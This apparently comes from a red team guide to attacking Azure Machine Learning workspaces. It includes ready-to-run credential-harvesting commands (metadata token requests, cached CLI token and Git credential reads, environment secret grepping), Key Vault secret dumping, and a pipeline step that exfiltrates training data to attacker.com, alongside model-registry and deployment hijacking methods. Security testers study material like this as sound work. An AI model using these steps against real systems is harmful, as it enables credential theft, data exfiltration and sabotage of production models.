Azure ML Exploitation
Red team attack methodology for Azure Machine Learning: workspace security, compute instance attacks, pipeline poisoning, model registry tampering, and data store exploitation.
Azure Machine Learning is Microsoft's enterprise ML platform providing managed compute, experimentation tracking, automated ML, model deployment, and MLOps pipelines. From a red team perspective, Azure ML workspaces are high-value targets because they aggregate access to sensitive data, trained models, compute resources, and credentials for external services. A compromised workspace often provides paths to both the ML pipeline and the broader Azure environment.
Workspace Security
Workspace Architecture
An Azure ML workspace is associated with several dependent Azure resources:
| Resource | Purpose | Attack Relevance |
|---|---|---|
| Azure Storage Account | Default data store for experiments, models, snapshots | Training data access, model artifact theft |
| Azure Key Vault | Credential storage for workspace secrets | API keys, connection strings, certificates |
| Azure Container Registry | Docker images for training and deployment | Container image tampering, supply chain attacks |
| Application Insights | Telemetry and monitoring | Log access, operational intelligence |
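The dependent resources above are exposed as ARM resource IDs on the workspace object. A minimal sketch that pulls out the resource names, assuming JSON shaped like `az ml workspace show -o json` output (field names and sample values are illustrative):

```python
import json

# Illustrative sample shaped like `az ml workspace show -o json` output
workspace_json = """
{
  "name": "ml-prod",
  "storage_account": "/subscriptions/000/resourceGroups/rg/providers/Microsoft.Storage/storageAccounts/mlprodstore",
  "key_vault": "/subscriptions/000/resourceGroups/rg/providers/Microsoft.KeyVault/vaults/mlprodkv",
  "container_registry": "/subscriptions/000/resourceGroups/rg/providers/Microsoft.ContainerRegistry/registries/mlprodacr"
}
"""

def dependent_resources(ws: dict) -> dict:
    """Extract the resource name from each dependent-service ARM ID."""
    return {
        field: ws[field].rsplit("/", 1)[-1]
        for field in ("storage_account", "key_vault", "container_registry")
        if ws.get(field)
    }

print(dependent_resources(json.loads(workspace_json)))
```

Each extracted name is a follow-on enumeration target (storage containers, Key Vault secrets, ACR repositories).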
# Get workspace details and associated resources
az ml workspace show --name <ws> --resource-group <rg> \
--query "{storage:storage_account, keyVault:key_vault, acr:container_registry}"
# List workspace connections (may contain credentials)
az ml connection list --workspace-name <ws> --resource-group <rg>
RBAC Exploitation
Azure ML uses several built-in roles with different privilege levels:
| Role | Capabilities | Red Team Interest |
|---|---|---|
| AzureML Data Scientist | Run experiments, deploy models, access compute | Training pipeline access, model deployment |
| AzureML Compute Operator | Manage compute resources | Create compute for credential theft |
| Contributor on workspace | Full workspace management | All workspace operations including connections |
| Reader on workspace | View workspace contents | Enumerate assets, view experiment logs |
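As a rough triage aid, the table can be encoded as a lookup from assigned role to candidate attack paths. The mapping below is an illustrative simplification, not an authoritative statement of role permissions:

```python
# Candidate attack paths per built-in Azure ML role (simplified from the table above)
ROLE_ATTACK_PATHS = {
    "AzureML Data Scientist": ["training pipeline access", "model deployment"],
    "AzureML Compute Operator": ["create compute for credential theft"],
    "Contributor": ["all workspace operations", "connection credential access"],
    "Reader": ["asset enumeration", "experiment log review"],
}

def attack_paths(roles):
    """Union of candidate attack paths for the caller's assigned roles."""
    paths = set()
    for role in roles:
        paths.update(ROLE_ATTACK_PATHS.get(role, []))
    return sorted(paths)

print(attack_paths(["Reader", "AzureML Compute Operator"]))
```

Cross-reference the output against actual role assignments (`az role assignment list`) before planning next steps.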
Compute Instance Attacks
Compute as a Pivot Point
Azure ML compute instances are managed VMs with Jupyter, VS Code, and terminal access. They function similarly to SageMaker notebook instances as pivot points for lateral movement.
# List compute instances
az ml compute list --workspace-name <ws> --resource-group <rg> --type ComputeInstance
# Get compute details
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg>
# Access via workspace (creates access URL)
# Navigate to Azure ML Studio > Compute > Instances > Connect
Credential Harvesting
From a compromised compute instance:
# Managed identity token for Azure management
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
# Managed identity token for storage access
curl -H "Metadata: true" \
"http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://storage.azure.com/"
# Check for cached Azure CLI credentials
cat ~/.azure/accessTokens.json 2>/dev/null
cat ~/.azure/msal_token_cache.json 2>/dev/null
# Check environment variables for credentials
env | grep -i -E "(key|secret|password|token|connection)"
# Check for Git credentials (common on data science instances)
cat ~/.git-credentials 2>/dev/null
git config --global credential.helper
Startup Script Attacks
Azure ML compute instances support setup scripts that run on creation. If modifiable, these scripts provide persistence:
# Check if the compute has a setup script
az ml compute show --name <compute> --workspace-name <ws> --resource-group <rg> \
--query "setup_scripts"
Shared Compute Risks
When multiple data scientists share a workspace, compute instances may be accessible to other workspace users depending on configuration:
- SSH access: If SSH is enabled, other workspace users with the SSH key can access the instance
- Shared file systems: Workspace-level file shares may be mounted across compute instances
- Terminal access: Workspace contributors can access terminal sessions on any compute instance in the workspace
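The SSH exposure above is visible in enumeration output. A sketch that flags SSH-enabled compute instances, assuming JSON shaped like `az ml compute list -o json` output (field names and sample data are illustrative):

```python
import json

# Illustrative sample shaped like `az ml compute list -o json` output
compute_json = """
[
  {"name": "ci-alice", "type": "computeinstance", "ssh_public_access_enabled": true},
  {"name": "ci-bob", "type": "computeinstance", "ssh_public_access_enabled": false},
  {"name": "cpu-cluster", "type": "amlcompute"}
]
"""

def ssh_exposed_instances(computes):
    """Return names of compute instances with SSH public access enabled."""
    return [
        c["name"] for c in computes
        if c.get("type") == "computeinstance" and c.get("ssh_public_access_enabled")
    ]

print(ssh_exposed_instances(json.loads(compute_json)))
```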
Pipeline Poisoning
Pipeline Architecture
Azure ML pipelines define multi-step ML workflows: data preprocessing, feature engineering, model training, evaluation, and deployment. Pipelines are defined as code (Python SDK or YAML) and executed on workspace compute.
Attack Vectors
Pipeline definition tampering
Modify pipeline definitions to inject malicious steps. If pipeline code is stored in a connected Git repository, compromise the repository to modify pipeline logic.
# Injected pipeline step that exfiltrates training data
- name: exfiltrate_data
  command: >
    curl -X POST https://attacker.com/collect -d @${{inputs.training_data}}
  environment: azureml:default-env:1
  compute: azureml:cpu-cluster
Environment manipulation
Azure ML environments define the software dependencies for pipeline steps. Tampering with environment definitions allows dependency injection:
# List environments
az ml environment list --workspace-name <ws> --resource-group <rg>
# Register a modified environment with malicious packages
az ml environment create --file modified-env.yml \
  --workspace-name <ws> --resource-group <rg>
Component substitution
Azure ML pipelines use reusable components. Registering a malicious component under the same name with a higher version number causes any pipeline that references the component without pinning a version to pick up the tampered copy on its next execution.
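The substitution works because an unpinned component reference resolves to the highest registered version. A simplified sketch of that resolution logic (version strings assumed to be dotted numerics):

```python
def resolve_latest(versions):
    """Pick the highest registered version, as an unpinned reference would."""
    return max(versions, key=lambda v: tuple(int(p) for p in v.split(".")))

# Legitimate versions of a shared preprocessing component
registered = ["1.0", "1.1", "2.0"]
assert resolve_latest(registered) == "2.0"

# Attacker registers a higher version containing tampered logic
registered.append("2.1")
print(resolve_latest(registered))  # the tampered version now wins
```

Pinning component versions in pipeline definitions is what closes this gap, which is also why attackers look for unpinned references first.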
Schedule manipulation
Pipelines can run on schedules. Modifying a schedule to trigger a poisoned pipeline at a specific time allows timed attacks:
# List schedules
az ml schedule list --workspace-name <ws> --resource-group <rg>
Model Registry Tampering
Registry Structure
The Azure ML model registry stores model versions with metadata, lineage tracking, and deployment state. It serves as the source of truth for which model versions are deployed to production endpoints.
# List registered models
az ml model list --workspace-name <ws> --resource-group <rg>
# Get model details including artifact location
az ml model show --name <model> --version <ver> \
--workspace-name <ws> --resource-group <rg>
Tampering Techniques
| Technique | Method | Impact |
|---|---|---|
| Version injection | Register a new version of an existing model with tampered artifacts | Next deployment picks up backdoored model |
| Artifact replacement | Modify model files in the backing storage account | Deployed model serves attacker-controlled predictions |
| Metadata manipulation | Change model tags or properties to influence selection | Automated pipelines deploy the wrong model |
| Lineage spoofing | Register models with fabricated experiment lineage | Bypass provenance checks |
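Artifact replacement in the backing storage account succeeds silently unless consumers pin artifact digests at registration time. A minimal integrity-check sketch (the digest-pinning scheme is illustrative, not a built-in Azure ML feature):

```python
import hashlib

def artifact_digest(data: bytes) -> str:
    """SHA-256 digest of a model artifact blob."""
    return hashlib.sha256(data).hexdigest()

# Digest recorded out-of-band at model registration time
original = b"model-weights-v1"
pinned = artifact_digest(original)

# Artifact later fetched from the backing storage account
fetched = b"model-weights-v1-backdoored"
if artifact_digest(fetched) != pinned:
    print("artifact mismatch: possible replacement in backing storage")
```

From the attacker's side, the same observation applies in reverse: if no digest pinning exists, replacing the blob in storage is indistinguishable from a legitimate re-upload.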
Deployment Hijacking
Azure ML supports managed online endpoints (fully managed) and Kubernetes online endpoints (customer-managed AKS):
# List online endpoints
az ml online-endpoint list --workspace-name <ws> --resource-group <rg>
# Get endpoint details
az ml online-endpoint show --name <endpoint> \
--workspace-name <ws> --resource-group <rg>
# List deployments within an endpoint
az ml online-deployment list --endpoint-name <endpoint> \
--workspace-name <ws> --resource-group <rg>
Deployment hijacking: update an existing deployment to point to a tampered model version, or modify traffic routing to send requests to an attacker-controlled deployment.
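Traffic manipulation works because an online endpoint splits requests across its deployments by percentage. A sketch of the routing change an attacker aims for (deployment names are illustrative; in practice the split is changed through the endpoint's traffic settings, e.g. via `az ml online-endpoint update`):

```python
def hijack_traffic(traffic: dict, target: str) -> dict:
    """Route 100% of endpoint traffic to the attacker-controlled deployment."""
    return {name: (100 if name == target else 0) for name in {*traffic, target}}

# Legitimate split before tampering (deployment names illustrative)
before = {"blue": 90, "green": 10}
print(hijack_traffic(before, "malicious"))
```

Because the legitimate deployments remain registered at 0% traffic, the endpoint still enumerates as healthy, which delays detection.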
Data Store Exploitation
Data Store Architecture
Azure ML data stores are abstractions over Azure storage services. They store credentials or use managed identity to access underlying storage:
# List data stores
az ml datastore list --workspace-name <ws> --resource-group <rg>
# Get data store details (may reveal storage account names, container names)
az ml datastore show --name <datastore> \
--workspace-name <ws> --resource-group <rg>
Credential Extraction
Data stores can authenticate using:
- Account keys: Stored in the workspace Key Vault
- SAS tokens: Time-limited but may have broad scope
- Managed identity: Workspace identity with storage access
- Service principal: Application credentials stored in Key Vault
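Recovered account keys typically arrive embedded in a storage connection string (in environment variables or Key Vault secrets). A sketch extracting the key material, using the standard Azure connection-string format (sample value is fake):

```python
def parse_connection_string(conn: str) -> dict:
    """Split an Azure storage connection string into its key/value parts."""
    return dict(part.split("=", 1) for part in conn.split(";") if part)

# Illustrative connection string, as found in env vars or Key Vault secrets
sample = (
    "DefaultEndpointsProtocol=https;"
    "AccountName=mlprodstore;"
    "AccountKey=abc123fakekey==;"
    "EndpointSuffix=core.windows.net"
)
parts = parse_connection_string(sample)
print(parts["AccountName"], parts["AccountKey"])
```

Note the `split("=", 1)`: account keys are base64 and usually end in `=`, so splitting on every `=` would corrupt the value.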
# Access Key Vault secrets (if workspace identity or user has access)
az keyvault secret list --vault-name <vault>
az keyvault secret show --vault-name <vault> --name <secret>
Data Access Through Workspace Identity
The workspace's managed identity typically has Storage Blob Data Contributor or Storage Blob Data Reader on connected storage accounts. From a compromised compute instance:
from azure.identity import ManagedIdentityCredential
from azure.storage.blob import BlobServiceClient
credential = ManagedIdentityCredential()
blob_service = BlobServiceClient(
    account_url="https://<storage>.blob.core.windows.net",
    credential=credential
)
# List containers and blobs
for container in blob_service.list_containers():
    print(f"Container: {container.name}")
    container_client = blob_service.get_container_client(container.name)
    for blob in container_client.list_blobs():
        print(f"  Blob: {blob.name}")
Related Topics
- Azure AI Services Overview -- Service landscape and enumeration
- Azure OpenAI Attack Surface -- Azure OpenAI-specific attacks
- Defender for AI Bypass -- Evading detection during exploitation
- SageMaker Exploitation -- Comparable AWS ML platform attacks
References
- Azure ML Security -- Enterprise security documentation
- Azure ML RBAC -- Role-based access control
- Azure ML Data Stores -- Data store configuration